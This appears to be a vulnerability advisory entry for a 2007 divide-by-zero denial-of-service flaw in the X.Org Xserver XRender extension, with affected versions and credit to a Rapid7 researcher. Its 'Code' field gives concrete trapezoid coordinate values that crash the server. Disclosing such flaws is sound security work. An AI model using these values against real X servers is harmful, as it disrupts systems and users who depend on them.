exploits , vulnerabilities , articles , X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability

Title	X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability
Published	2007-05-01-12:00AM
Updated	2007-05-04-09:49PM
Class	Design Error
CVE
Remote	Yes
Local	Yes
Credit	Derek Abdine of Rapid7 is credited with the discovery of this vulnerability.
Vulnerable	X.org Xserver 1.3 X.org X11R7 7.2 X.org X11R7 7.1 X.org X11R7 7.0 Sun Solaris 10.0 _x86 Sun Solaris 9_x86 Sun Solaris 10_x86
Not Vulnerable
Code	Attackers use standard X client API calls to exploit this issue. The following trapezoid data is sufficient to demonstrate this issue: pTraps[0].top = 13275; pTraps[0].bottom = 26791; pTraps[0].left.p1.x = 26765; pTraps[0].left.p1.y = 13802; pTraps[0].left.p2.x = 48451; pTraps[0].left.p2.y = 1366; pTraps[0].right.p1.x = 45782; pTraps[0].right.p1.y = 14369; pTraps[0].right.p2.x = 50685; pTraps[0].right.p2.y = 3518; pTraps[1].top = 52058; pTraps[1].bottom = 56949; pTraps[1].left.p1.x = 7641; pTraps[1].left.p1.y = 35604; pTraps[1].left.p2.x = 18593; pTraps[1].left.p2.y = 60832; pTraps[1].right.p1.x = 45277; pTraps[1].right.p1.y = 1073; pTraps[1].right.p2.x = 51659; pTraps[1].right.p2.y = 1073; pTraps[2].top = 53368; pTraps[2].bottom = 18772; pTraps[2].left.p1.x = 34644; pTraps[2].left.p1.y = 11603; pTraps[2].left.p2.x = 24261; pTraps[2].left.p2.y = 13272; pTraps[2].right.p1.x = 54806; pTraps[2].right.p1.y = 46200; pTraps[2].right.p2.x = 5052; pTraps[2].right.p2.y = 22005;
TXT